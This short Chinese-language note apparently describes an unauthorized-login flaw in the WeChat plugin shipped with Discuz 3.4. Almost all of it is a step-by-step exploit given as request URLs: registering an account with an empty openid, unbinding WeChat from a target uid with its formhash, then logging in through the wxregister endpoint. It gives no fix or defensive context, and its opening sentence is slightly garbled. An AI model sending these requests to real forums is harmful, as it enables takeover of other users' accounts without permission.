Discuz3.4越权登录漏洞

由于DZ 3.4默认安装了，攻击者可以利用该漏洞越权登陆。

通过/plugin.php?id=wechat:wechat&ac=wxregister&username={name}这种方式可以使openid为空， 但注册的是一个新的账号。

解除指定uid绑定的微信：

/plugin.php?id=wechat:wechat&ac=unbindmp&uid={uid}&hash={formhash}

登陆第一个openid为空的账号：/plugin.php?id=wechat:wechat&ac=wxregister